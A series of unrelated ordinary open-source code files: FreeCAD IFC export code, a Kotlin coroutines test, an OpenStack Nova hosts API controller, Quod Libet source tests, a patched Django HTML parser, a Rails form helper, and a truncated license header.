elif tp == "IfcInteger":
val = int(val)
else:
val = float(val)
props.append(ifcfile.createIfcPropertySingleValue(str(key),None,ifcfile.create_entity(str(tp),val),None))
if props:
pset = ifcfile.createIfcPropertySet(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'PropertySet',None,props)
ifcfile.createIfcRelDefinesByProperties(ifcopenshell.guid.compress(uuid.uuid1().hex),history,None,None,[product],pset)
count += 1
# relationships
sites = []
buildings = []
floors = []
for site in Draft.getObjectsOfType(objectslist,"Site"):
for building in Draft.getObjectsOfType(site.Group,"Building"):
for floor in Draft.getObjectsOfType(building.Group,"Floor"):
children = Draft.getGroupContents(floor,walls=True)
children = Arch.pruneIncluded(children)
children = [products[c.Name] for c in children if c.Name in products.keys()]
floor = products[floor.Name]
ifcfile.createIfcRelContainedInSpatialStructure(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'StoreyLink','',children,floor)
floors.append(floor)
building = products[building.Name]
if floors:
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'BuildingLink','',building,floors)
buildings.append(building)
site = products[site.Name]
if buildings:
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'SiteLink','',site,buildings)
sites.append(site)
if not sites:
if DEBUG: print "adding default site"
sites = [ifcfile.createIfcSite(ifcopenshell.guid.compress(uuid.uuid1().hex),history,"Default Site",'',None,None,None,None,"ELEMENT",None,None,None,None,None)]
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'ProjectLink','',project,sites)
if not buildings:
if DEBUG: print "adding default building"
buildings = [ifcfile.createIfcBuilding(ifcopenshell.guid.compress(uuid.uuid1().hex),history,"Default Building",'',None,None,None,None,"ELEMENT",None,None,None)]
ifcfile.createIfcRelAggregates(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'SiteLink','',sites[0],buildings)
ifcfile.createIfcRelContainedInSpatialStructure(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'BuildingLink','',products.values(),buildings[0])
# materials
materials = {}
for m in Arch.getDocumentMaterials():
mat = ifcfile.createIfcMaterial(m.Label.encode("utf8"))
materials[m.Label] = mat
if "Color" in m.Material:
rgb = tuple([float(f) for f in m.Material['Color'].strip("()").split(",")])
col = ifcfile.createIfcColourRgb(None,rgb[0],rgb[1],rgb[2])
ssr = ifcfile.createIfcSurfaceStyleRendering(col,None,None,None,None,None,None,None,"FLAT")
iss = ifcfile.createIfcSurfaceStyle(None,"BOTH",[ssr])
psa = ifcfile.createIfcPresentationStyleAssignment([iss])
isi = ifcfile.createIfcStyledItem(None,[psa],None)
isr = ifcfile.createIfcStyledRepresentation(context,"Style","Material",[isi])
imd = ifcfile.createIfcMaterialDefinitionRepresentation(None,None,[isr],mat)
relobjs = []
for o in m.InList:
if hasattr(o,"BaseMaterial"):
if o.BaseMaterial:
if o.BaseMaterial.Name == m.Name:
if o.Name in products:
relobjs.append(products[o.Name])
if relobjs:
ifcfile.createIfcRelAssociatesMaterial(ifcopenshell.guid.compress(uuid.uuid1().hex),history,'MaterialLink','',relobjs,mat)
if DEBUG: print "writing ",filename,"..."
ifcfile.write(filename)
def getRepresentation(ifcfile,context,obj,forcebrep=False,subtraction=False,tessellation=1):
"""returns an IfcShapeRepresentation object or None"""
import Part,math,DraftGeomUtils,DraftVecUtils
shapes = []
placement = None
productdef = None
shapetype = "no shape"
if not forcebrep:
profile = None
if hasattr(obj,"Proxy"):
if hasattr(obj.Proxy,"getProfiles"):
p = obj.Proxy.getProfiles(obj,noplacement=True)
extrusionv = obj.Proxy.getExtrusionVector(obj,noplacement=True)
if not DraftVecUtils.isNull(extrusionv):
extrusionv.multiply(0.001) # to meters
if (len(p) == 1) and extrusionv:
p = p[0]
p.scale(0.001) # to meters
r = obj.Proxy.getPlacement(obj)
r.Base = r.Base.multiply(0.001) # to meters
if len(p.Edges) == 1:
pxvc = ifcfile.createIfcDirection((1.0,0.0))
povc = ifcfile.createIfcCartesianPoint((0.0,0.0))
pt = ifcfile.createIfcAxis2Placement2D(povc,pxvc)
# extruded circle
if isinstance(p.Edges[0].Curve,Part.Circle):
profile = ifcfile.createIfcCircleProfileDef("AREA",None,pt, p.Edges[0].Curve.Radius)
# extruded ellipse
elif isinstance(p.Edges[0].Curve,Part.Ellipse):
profile = ifcfile.createIfcEllipseProfileDef("AREA",None,pt, p.Edges[0].Curve.MajorRadius, p.Edges[0].Curve.MinorRadius)
else:
curves = False
for e in p.Edges:
if isinstance(e.Curve,Part.Circle):
curves = True
# extruded polyline
if not curves:
w = Part.Wire(DraftGeomUtils.sortEdges(p.Edges))
pts = [ifcfile.createIfcCartesianPoint(tuple(v.Point)[:2]) for v in w.Vertexes+[w.Vertexes[0]]]
pol = ifcfile.createIfcPolyline(pts)
# extruded composite curve
else:
segments = []
last = None
edges = DraftGeomUtils.sortEdges(p.Edges)
for e in edges:
if isinstance(e.Curve,Part.Circle):
follow = True
if last:
if not DraftVecUtils.equals(last,e.Vertexes[0].Point):
follow = False
last = e.Vertexes[0].Point
else:
last = e.Vertexes[-1].Point
else:
last = e.Vertexes[-1].Point
p1 = math.degrees(-DraftVecUtils.angle(e.Vertexes[0].Point.sub(e.Curve.Center)))
p2 = math.degrees(-DraftVecUtils.angle(e.Vertexes[-1].Point.sub(e.Curve.Center)))
da = DraftVecUtils.angle(e.valueAt(e.FirstParameter+0.1).sub(e.Curve.Center),e.Vertexes[0].Point.sub(e.Curve.Center))
if p1 < 0:
p1 = 360 + p1
if p2 < 0:
p2 = 360 + p2
if da > 0:
follow = not(follow)
xvc = ifcfile.createIfcDirection((1.0,0.0))
ovc = ifcfile.createIfcCartesianPoint(tuple(e.Curve.Center)[:2])
plc = ifcfile.createIfcAxis2Placement2D(ovc,xvc)
cir = ifcfile.createIfcCircle(plc,e.Curve.Radius)
curve = ifcfile.createIfcTrimmedCurve(cir,[ifcfile.createIfcParameterValue(p1)],[ifcfile.createIfcParameterValue(p2)],follow,"PARAMETER")
else:
verts = [vertex.Point for vertex in e.Vertexes]
if last:
if not DraftVecUtils.equals(last,verts[0]):
verts.reverse()
last = e.Vertexes[0].Point
else:
last = e.Vertexes[-1].Point
else:
last = e.Vertexes[-1].Point
pts = [ifcfile.createIfcCartesianPoint(tuple(v)[:2]) for v in verts]
curve = ifcfile.createIfcPolyline(pts)
segment = ifcfile.createIfcCompositeCurveSegment("CONTINUOUS",True,curve)
segments.append(segment)
pol = ifcfile.createIfcCompositeCurve(segments,False)
profile = ifcfile.createIfcArbitraryClosedProfileDef("AREA",None,pol)
if profile:
xvc = ifcfile.createIfcDirection(tuple(r.Rotation.multVec(FreeCAD.Vector(1,0,0))))
zvc = ifcfile.createIfcDirection(tuple(r.Rotation.multVec(FreeCAD.Vector(0,0,1))))
ovc = ifcfile.createIfcCartesianPoint(tuple(r.Base))
lpl = ifcfile.createIfcAxis2Placement3D(ovc,zvc,xvc)
edir = ifcfile.createIfcDirection(tuple(FreeCAD.Vector(extrusionv).normalize()))
shape = ifcfile.createIfcExtrudedAreaSolid(profile,lpl,edir,extrusionv.Length)
shapes.append(shape)
solidType = "SweptSolid"
shapetype = "extrusion"
if not shapes:
# brep representation
fcshape = None
solidType = "Brep"
if subtraction:
if hasattr(obj,"Proxy"):
if hasattr(obj.Proxy,"getSubVolume"):
fcshape = obj.Proxy.getSubVolume(obj)
if not fcshape:
if hasattr(obj,"Shape"):
if obj.Shape:
if not obj.Shape.isNull():
fcshape = obj.Shape
elif hasattr(obj,"Terrain"):
if obj.Terrain:
if hasattr(obj.Terrain,"Shape"):
if obj.Terrain.Shape:
if not obj.Terrain.Shape.isNull():
fcshape = obj.Terrain.Shape
if fcshape:
solids = []
if fcshape.Solids:
dataset = fcshape.Solids
else:
dataset = fcshape.Shells
print "Warning! object contains no solids"
for fcsolid in dataset:
fcsolid.scale(0.001) # to meters
faces = []
curves = False
for fcface in fcsolid.Faces:
for e in fcface.Edges:
if not isinstance(e.Curve,Part.Line):
if e.curvatureAt(e.FirstParameter+(e.LastParameter-e.FirstParameter)/2) > 0.0001:
curves = True
break
if curves:
#shapetype = "triangulated"
#tris = fcsolid.tessellate(tessellation)
#for tri in tris[1]:
# pts = [ifcfile.createIfcCartesianPoint(tuple(tris[0][i])) for i in tri]
# loop = ifcfile.createIfcPolyLoop(pts)
# bound = ifcfile.createIfcFaceOuterBound(loop,True)
# face = ifcfile.createIfcFace([bound])
# faces.append(face)
fcsolid = Arch.removeCurves(fcsolid)
shapetype = "brep"
for fcface in fcsolid.Faces:
loops = []
verts = [v.Point for v in Part.Wire(DraftGeomUtils.sortEdges(fcface.OuterWire.Edges)).Vertexes]
c = fcface.CenterOfMass
v1 = verts[0].sub(c)
v2 = verts[1].sub(c)
n = fcface.normalAt(0,0)
if DraftVecUtils.angle(v2,v1,n) >= 0:
verts.reverse() # inverting verts order if the direction is couterclockwise
pts = [ifcfile.createIfcCartesianPoint(tuple(v)) for v in verts]
loop = ifcfile.createIfcPolyLoop(pts)
bound = ifcfile.createIfcFaceOuterBound(loop,True)
loops.append(bound)
for wire in fcface.Wires:
if wire.hashCode() != fcface.OuterWire.hashCode():
verts = [v.Point for v in Part.Wire(DraftGeomUtils.sortEdges(wire.Edges)).Vertexes]
v1 = verts[0].sub(c)
v2 = verts[1].sub(c)
if DraftVecUtils.angle(v2,v1,DraftVecUtils.neg(n)) >= 0:
verts.reverse()
pts = [ifcfile.createIfcCartesianPoint(tuple(v)) for v in verts]
loop = ifcfile.createIfcPolyLoop(pts)
bound = ifcfile.createIfcFaceBound(loop,True)
loops.append(bound)
face = ifcfile.createIfcFace(loops)
faces.append(face)
shell = ifcfile.createIfcClosedShell(faces)
shape = ifcfile.createIfcFacetedBrep(shell)
shapes.append(shape)
if shapes:
# set surface style
if FreeCAD.GuiUp and (not subtraction) and hasattr(obj.ViewObject,"ShapeColor"):
# only set a surface style if the object has no material.
# apparently not needed, no harm in having both.
#m = False
#if hasattr(obj,"BaseMaterial"):
# if obj.BaseMaterial:
# if "Color" in obj.BaseMaterial.Material:
# m = True
#if not m:
rgb = obj.ViewObject.ShapeColor[:3]
if rgb in surfstyles:
psa = surfstyles[rgb]
else:
col = ifcfile.createIfcColourRgb(None,rgb[0],rgb[1],rgb[2])
ssr = ifcfile.createIfcSurfaceStyleRendering(col,None,None,None,None,None,None,None,"FLAT")
iss = ifcfile.createIfcSurfaceStyle(None,"BOTH",[ssr])
psa = ifcfile.createIfcPresentationStyleAssignment([iss])
surfstyles[rgb] = psa
for shape in shapes:
isi = ifcfile.createIfcStyledItem(shape,[psa],None)
xvc = ifcfile.createIfcDirection((1.0,0.0,0.0))
zvc = ifcfile.createIfcDirection((0.0,0.0,1.0))
ovc = ifcfile.createIfcCartesianPoint((0.0,0.0,0.0))
gpl = ifcfile.createIfcAxis2Placement3D(ovc,zvc,xvc)
placement = ifcfile.createIfcLocalPlacement(None,gpl)
representation = ifcfile.createIfcShapeRepresentation(context,'Body',solidType,shapes)
productdef = ifcfile.createIfcProductDefinitionShape(None,None,[representation])
return productdef,placement,shapetype
def setRepresentation(representation):
"""Returns a shape from a 2D IfcShapeRepresentation"""
def getPolyline(ent):
pts = []
for p in ent.Points:
c = p.Coordinates
pts.append(FreeCAD.Vector(c[0],c[1],c[2] if len(c) > 2 else 0))
return Part.makePolygon(pts)
def getCircle(ent):
c = ent.Position.Location.Coordinates
c = FreeCAD.Vector(c[0],c[1],c[2] if len(c) > 2 else 0)
r = ent.Radius
return Part.makeCircle(r,c)
result = []
if representation.is_a("IfcShapeRepresentation"):
for item in representation.Items:
if item.is_a("IfcGeometricCurveSet"):
for el in item.Elements:
if el.is_a("IfcPolyline"):
result.append(getPolyline(el))
elif el.is_a("IfcCircle"):
result.append(getCircle(el))
elif el.is_a("IfcTrimmedCurve"):
base = el.BasisCurve
t1 = el.Trim1[0].wrappedValue
t2 = el.Trim2[0].wrappedValue
if not el.SenseAgreement:
t1,t2 = t2,t1
if base.is_a("IfcPolyline"):
bc = getPolyline(base)
result.append(bc)
elif base.is_a("IfcCircle"):
bc = getCircle(base)
e = Part.ArcOfCircle(bc.Curve,math.radians(t1),math.radians(t2)).toShape()
d = base.Position.RefDirection.DirectionRatios
v = FreeCAD.Vector(d[0],d[1],d[2] if len(d) > 2 else 0)
a = -DraftVecUtils.angle(v)
e.rotate(bc.Curve.Center,FreeCAD.Vector(0,0,1),math.degrees(a))
result.append(e)
return result | unknown | codeparrot/codeparrot-clean | ||
package kotlinx.coroutines.flow
import kotlinx.coroutines.testing.*
import kotlinx.coroutines.*
import org.junit.*
class SafeCollectorMemoryLeakTest : TestBase() {
// custom List.forEach impl to avoid using iterator (FieldWalker cannot scan it)
private inline fun <T> List<T>.listForEach(action: (T) -> Unit) {
for (i in indices) action(get(i))
}
@Test
fun testCompletionIsProperlyCleanedUp() = runBlocking {
val job = flow {
emit(listOf(239))
expect(2)
hang {}
}.transform { l -> l.listForEach { _ -> emit(42) } }
.onEach { expect(1) }
.launchIn(this)
yield()
expect(3)
FieldWalker.assertReachableCount(0, job) { it == 239 }
job.cancelAndJoin()
finish(4)
}
@Test
fun testCompletionIsNotCleanedUp() = runBlocking {
val job = flow {
emit(listOf(239))
hang {}
}.transform { l -> l.listForEach { _ -> emit(42) } }
.onEach {
expect(1)
hang { finish(3) }
}
.launchIn(this)
yield()
expect(2)
FieldWalker.assertReachableCount(1, job) { it == 239 }
job.cancelAndJoin()
}
} | kotlin | github | https://github.com/Kotlin/kotlinx.coroutines | kotlinx-coroutines-core/jvm/test/flow/SafeCollectorMemoryLeakTest.kt |
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
from oslo_log import log as logging
import six
import webob.exc
from nova.api.openstack import extensions
from nova import compute
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LI
from nova import objects
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'hosts')
class HostController(object):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
def index(self, req):
"""Returns a dict in the format:
| {'hosts': [{'host_name': 'some.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.other.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.celly.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'console1.host.com',
| 'service': 'consoleauth',
| 'zone': 'internal'},
| {'host_name': 'network1.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'netwwork2.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'compute1.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'compute2.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'sched1.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'sched2.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'vol1.host.com',
| 'service': 'volume',
| 'zone': 'internal'}]}
"""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks
nova_context.require_admin_context(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
for service in services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
def update(self, req, id, body):
"""Updates a specified body.
:param body: example format {'status': 'enable',
'maintenance_mode': 'enable'}
"""
def read_enabled(orig_val, msg):
"""Checks a specified orig_val and returns True for 'enabled'
and False for 'disabled'.
:param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
# See what the user wants to 'update'
params = {k.strip().lower(): v for k, v in six.iteritems(body)}
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % params.keys()[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id, maint_mode)
return result
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
LOG.info(_LI("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host
"""
if enabled:
LOG.info(_LI("Enabling host %s.") % host_name)
else:
LOG.info(_LI("Disabling host %s.") % host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": host_name, "power_action": result}
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node['vcpus'],
'memory_mb': compute_node['memory_mb'],
'disk_gb': compute_node['local_gb']}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node['vcpus_used'],
'memory_mb': compute_node['memory_mb_used'],
'disk_gb': compute_node['local_gb_used']}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Getting usage resource per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': {'resource':D},..}
D: {'host': 'hostname','project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
# NOTE(eliqiao): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
host_name = id
try:
compute_node = (
objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host_name))
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in six.itervalues(by_proj_resources):
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.ExtensionDescriptor):
"""Admin-only host administration."""
name = "Hosts"
alias = "os-hosts"
namespace = "http://docs.openstack.org/compute/ext/hosts/api/v1.1"
updated = "2011-06-29T00:00:00Z"
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
collection_actions={'update': 'PUT'},
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2014, 2015 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import os
import re
import pprint
from gi.repository import Gtk
from quodlibet.util import get_module_dir
from tests import TestCase
def iter_py_paths():
"""Iterates over all Python source files that are part of Quod Libet"""
import quodlibet
root = os.path.dirname(get_module_dir(quodlibet))
skip = [
os.path.join(root, "build"),
os.path.join(root, "dist"),
os.path.join(root, "docs"),
os.path.join(root, "dev-utils"),
os.path.join(root, "quodlibet", "packages"),
]
for dirpath, dirnames, filenames in os.walk(root):
if any((dirpath.startswith(s + os.sep) or s == dirpath)
for s in skip):
continue
for filename in filenames:
if filename.endswith('.py'):
yield os.path.join(dirpath, filename)
class TLicense(TestCase):
ALLOWED = ["""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
""", """
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
""",
]
def test_main(self):
allowed = []
for license in self.ALLOWED:
allowed.append("".join(license.split()))
found = set()
missing = []
for path in iter_py_paths():
header = b""
with open(path, "rb") as h:
for line in h:
line = line.strip()
if not line.startswith(b"#"):
break
header += line.lstrip(b"# ") + b"\n"
norm = b"".join(header.split())
norm = norm.decode("utf-8")
for license_ in allowed:
if license_ in norm:
found.add(license_)
break
else:
missing.append(path)
self.assertFalse(missing, msg="Missing license: %r" % missing)
assert len(allowed) == len(found)
class TStockIcons(TestCase):
def test_main(self):
# gtk setting keys start like stock icons, so white list them
white = [x.replace("_", "-") for x in
dir(Gtk.Settings.get_default().props) if x.startswith("gtk_")]
# older gtk doesn't have those, but we still have them in the source
white.append("gtk-dialogs-use-header")
white.append("gtk-primary-button-warps-slider")
# some more..
white.append("gtk-tooltip")
white.append("gtk-")
white.append("gtk-update-icon-cache-")
res = map(re.compile, [
"(Gtk\\.STOCK_[_A-Z]*)",
"[\"\'](gtk-[\\-a-z]*)",
])
errors = {}
for path in iter_py_paths():
with open(path, "rb") as h:
if path.endswith(("icons.py", "test_source.py")):
continue
data = h.read().decode("utf-8")
for r in res:
match = r.search(data)
if match:
group = match.group(1)
if group not in white:
errors.setdefault(group, []).append(path)
self.assertFalse(errors, msg=pprint.pformat(errors)) | unknown | codeparrot/codeparrot-clean | ||
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from six.moves import html_parser as _HTMLParser
def parse_starttag_patched(self, i):
"""This method is a patched version of the parse_starttag method from
django.utils.html_parser.HTMLParser class, used to patch bug 1273943.
The code is taken from file django/utils/html_parser.py, commit 6bc1b22299.
"""
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
tagfind = re.compile('([a-zA-Z][-.a-zA-Z0-9:_]*)(?:\s|/(?!>))*')
match = tagfind.match(rawdata, i + 1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
m = _HTMLParser.attrfind.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif (attrvalue[:1] == '\'' == attrvalue[-1:] or
attrvalue[:1] == '"' == attrvalue[-1:]):
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = (len(self.__starttag_text)
- self.__starttag_text.rfind("\n"))
else:
offset = offset + len(self.__starttag_text)
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag) # <--------------------------- Changed
return endpos | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true
module ActionView
module Helpers
module Tags # :nodoc:
class NumberField < TextField # :nodoc:
def render
options = @options.stringify_keys
if range = options.delete("in") || options.delete("within")
options.update("min" => range.min, "max" => range.max)
end
@options = options
super
end
end
end
end
end | ruby | github | https://github.com/rails/rails | actionview/lib/action_view/helpers/tags/number_field.rb |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @file make_qml_dbus_cpp.py
# @brief Generator of QML to QDbus C++ part
#
# This file is a part of HMI D-Bus layer.
#
# Copyright (c) 2014, Ford Motor Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the Ford Motor Company nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
